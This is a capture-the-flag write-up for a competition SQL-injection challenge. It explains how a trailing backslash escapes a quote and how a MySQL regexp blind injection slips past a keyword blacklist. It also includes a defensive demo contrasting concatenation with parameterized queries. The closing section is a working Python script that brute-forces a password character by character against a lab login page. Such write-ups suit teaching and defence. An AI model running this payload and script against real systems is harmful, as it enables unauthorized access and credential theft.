ezsql

Challenge source: Karamay City 1st Cyber Security Skills Competition

0x01 Approach

The entry page prompts us to log in; clicking OK redirects to login.php.

Probing shows that the filter blocks select, union, ', ", =, like, and, among others.

Appending a backslash to the username escapes the closing single quote, so the quoted string swallows it and the following password field becomes controllable SQL: this is the injection point. Payload: or password regexp binary {}#

The data is guessed one character at a time with regexp matching; the binary keyword is needed so the match is case-sensitive.

The point of the challenge is MySQL regexp blind injection.
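To make the mechanism concrete from the defender's side, here is an added example (not the challenge's server code or the write-up's script). It models the flaw described above: a keyword blacklist in front of string-concatenated SQL, where a trailing backslash in the username escapes the closing quote and the password field lands outside any string literal. It then shows the same inputs against a parameterized query. The users table, the sample row, the filter word list and the hex pattern 0x5e53 ("^S") are assumptions constructed for the demonstration.

```python
import sqlite3

# Added example, not the challenge's own code. The filter words follow the
# write-up's list; the table and sample row are constructed for this demo.
BLACKLIST = ["select", "union", "'", '"', "=", "like", "and"]


def blacklist_rejects(value):
    """Return True if the (assumed case-insensitive) keyword filter would block the value."""
    low = value.lower()
    return any(word in low for word in BLACKLIST)


def build_query_vulnerable(username, password):
    """String concatenation with quote-wrapping: the pattern that lets the backslash trick work."""
    return f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"


def split_sql_contexts(sql):
    """Split a query into (kind, text) pieces using MySQL single-quote rules:
    a backslash escapes the next character inside a literal and '#' starts a
    line comment. kind is 'str', 'code' or 'comment'."""
    pieces, buf, in_str, i = [], "", False, 0
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\" and i + 1 < len(sql):   # escaped char stays inside the literal
                buf += sql[i + 1]
                i += 2
                continue
            if c == "'":                         # literal closes
                pieces.append(("str", buf))
                buf, in_str = "", False
            else:
                buf += c
        else:
            if c == "#":                         # rest of the line is a comment
                if buf:
                    pieces.append(("code", buf))
                pieces.append(("comment", sql[i:]))
                return pieces
            if c == "'":                         # literal opens
                if buf:
                    pieces.append(("code", buf))
                buf, in_str = "", True
            else:
                buf += c
        i += 1
    if buf or in_str:
        pieces.append(("str" if in_str else "code", buf))
    return pieces


def sql_outside_quotes(username, password):
    """Code fragments of the concatenated query, i.e. the text the database parses as SQL."""
    sql = build_query_vulnerable(username, password)
    return [text for kind, text in split_sql_contexts(sql) if kind == "code"]


def make_demo_db():
    """In-memory SQLite stand-in for the login table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", "S3cret"))
    return conn


def safe_login(conn, username, password):
    """Hardened lookup: bound parameters keep both inputs as data, whatever they contain."""
    row = conn.execute(
        "SELECT 1 FROM users WHERE username=? AND password=?", (username, password)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    # Constructed input mirroring the write-up: username ends in a backslash,
    # password is the regexp payload carrying a hex literal (0x5e53 is "^S").
    user, pw = "admin\\", "or password regexp binary 0x5e53#"
    print("filter blocks it:", blacklist_rejects(user) or blacklist_rejects(pw))
    print("parsed as SQL:", sql_outside_quotes(user, pw))
    print("parsed as SQL (benign):", sql_outside_quotes("admin", "S3cret"))
    print("safe_login with payload:", safe_login(make_demo_db(), user, pw))
```

Running it shows why the blacklist is the wrong control: neither input contains a filtered word, yet the tokenizer reports the whole regexp clause as bare SQL because the literal that began at username= only ends at the quote that was meant to open the password. With bound parameters the same pair is just a username and password that match no row.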

0x02 Solution script

import requests
import string

def str2hex(s):
    # Encode the regexp pattern as a MySQL hex literal (0x...) so that no
    # quote characters are needed around it and the quote filter is not hit.
    result = ''
    for i in s:
        result += hex(ord(i))
    result = result.replace('0x', '')
    return '0x' + result

strs = string.ascii_letters + string.digits
url = "http://172.24.18.80/ezsql/login.php"
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0'
}
payload = 'or password regexp binary {}#'

if __name__ == "__main__":
    name = ''
    for i in range(1, 40):
        for j in strs:
            # Anchor the pattern at the start and test one more character
            passwd = str2hex('^' + name + j)
            payloads = payload.format(passwd)
            postdata = {
                'username': 'admin\\',   # trailing backslash escapes the closing quote
                'password': payloads
            }
            r = requests.post(url, data=postdata, headers=headers)
            if "Maybe you are right" in r.text:
                name += j
                print(j, end='')
                break